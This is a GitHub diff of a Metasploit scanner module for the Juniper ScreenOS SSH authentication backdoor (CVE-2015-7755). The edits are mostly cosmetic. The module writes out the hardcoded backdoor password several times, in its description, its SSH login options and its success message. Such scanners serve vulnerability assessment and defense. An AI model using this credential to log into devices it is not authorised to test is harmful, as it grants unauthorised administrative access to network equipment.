3
3
# Current source: https://github.com/rapid7/metasploit-framework
4
4
##
5
5
6
+ require 'net/ssh'
7
+
6
8
class MetasploitModule < Msf ::Auxiliary
7
9
8
- require 'net/ssh'
9
10
include Msf ::Auxiliary ::Scanner
10
11
include Msf ::Auxiliary ::Report
11
12
12
13
def initialize ( info = { } )
13
14
super ( update_info ( info ,
14
15
'Name' => 'Juniper SSH Backdoor Scanner' ,
15
16
'Description' => %q{
16
- This module scans for the Juniper SSH backdoor. Also valid on telnet .
17
- A username is required, and hte password is <<< %s(un='%s') = %u
17
+ This module scans for the Juniper SSH backdoor (also valid on Telnet) .
18
+ Any username is required, and the password is <<< %s(un='%s') = %u.
18
19
} ,
19
20
'Author' => [
20
- 'hdm' , # discovery
21
- 'h00die <mike@ stcyrsecurity.com>' # Module
21
+ 'hdm' , # Discovery
22
+ 'h00die <mike[at] stcyrsecurity.com>' # Module
22
23
] ,
23
24
'References' => [
24
25
[ 'CVE' , '2015-7755' ] ,
25
26
[ 'URL' , 'https://community.rapid7.com/community/infosec/blog/2015/12/20/cve-2015-7755-juniper-screenos-authentication-backdoor' ] ,
26
- [ 'URL' , 'https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10713&cat=SIRT_1&actp=LIST ' ]
27
+ [ 'URL' , 'https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10713' ]
27
28
] ,
28
29
'DisclosureDate' => 'Dec 20 2015' ,
29
30
'License' => MSF_LICENSE
@@ -43,7 +44,7 @@ def run_host(ip)
43
44
ssh_opts = {
44
45
port : rport ,
45
46
auth_methods : [ 'password' , 'keyboard-interactive' ] ,
46
- password : ' <<< %s(un=\ '%s\ ') = %u'
47
+ password : %q{ <<< %s(un='%s') = %u}
47
48
}
48
49
49
50
ssh_opts . merge! ( verbose : :debug ) if datastore [ 'SSH_DEBUG' ]
@@ -62,7 +63,7 @@ def run_host(ip)
62
63
end
63
64
64
65
if ssh
65
- print_good ( "#{ ip } :#{ rport } - Logged in with backdoor account admin:<<< %s(un=\ ' %s\ ' ) = %u" )
66
+ print_good ( "#{ ip } :#{ rport } - Logged in with backdoor account admin:<<< %s(un='%s') = %u" )
66
67
report_vuln (
67
68
:host => ip ,
68
69
:name => self . name ,
0 commit comments